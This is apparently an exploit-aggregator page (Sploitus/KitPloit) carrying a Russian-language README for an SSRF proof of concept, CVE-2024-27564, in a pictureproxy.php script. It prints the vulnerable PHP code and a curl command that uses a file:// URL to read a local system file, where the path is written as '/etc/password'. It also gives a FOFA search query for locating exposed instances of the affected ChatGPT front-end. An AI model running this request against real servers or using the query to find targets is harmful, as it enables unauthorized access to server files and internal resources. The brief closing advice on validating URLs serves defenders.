Sploitus

SSRF-Exploit

kitploit · 2026-09-05

Exploit Code

MARKDOWN65 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-CHAUDHRYMUHAMMADTAYAB-SSRF-EXPLOIT-CVE-2024-27564
# SSRF-Exploit-CVE-2024-27564

# Название проекта

Этот проект демонстрирует уязвимость Server-Side Request Forgery (SSRF) в файле `pictureproxy.php`.

## Описание

Уязвимость в `pictureproxy.php` позволяет удаленным злоумышленникам выполнять произвольные запросы, внедряя URL-адреса в параметр `url`. Эта уязвимость SSRF может быть использована без аутентификации, что делает её особенно опасной.

Уязвимый код находится в файле `pictureproxy.php`. Проблема возникает из-за того, что функция не проверяет должным образом параметр `url`. Переменная `$_GET['url']` передается в функцию `file_get_contents()`, которая получает содержимое по указанному URL. Это может привести к SSRF.

## Подтверждение концепции

Вот простая демонстрация концепции, показывающая, как можно эксплуатировать уязвимость:

root@kitploit:~
    
    
    <?php
    if (isset($_GET['url'])) {
        $image = file_get_contents($_GET['url']);
        header("Content-type: image/jpeg");
        echo $image;
    } else {
        echo "Invalid request";
    }
    

Чтобы протестировать уязвимость, можно использовать следующую команду curl:

root@kitploit:~
    
    
    curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password
    

### Протестировано с Open Redirect

Тест с использованием уязвимости открытого редиректа:

root@kitploit:~
    
    
    https://64.media.tumblr.com/f07b73b374dc2ff6d5e4dbf39d2a6467/tumblr_nvani31DCm1u5url1o1_1280.jpg
    

Banner

## Инструменты

  * **FOFA** : поисковая система для интернет-устройств и уязвимостей. Используйте следующую команду для поиска релевантных результатов:



root@kitploit:~
    
    
    "title="ChatGPT个人专用版""
    

## Заключение

Этот проект подчеркивает важность правильной проверки пользовательских вводов для предотвращения уязвимостей SSRF. Всегда проверяйте такие параметры, как URL-адреса, перед их обработкой.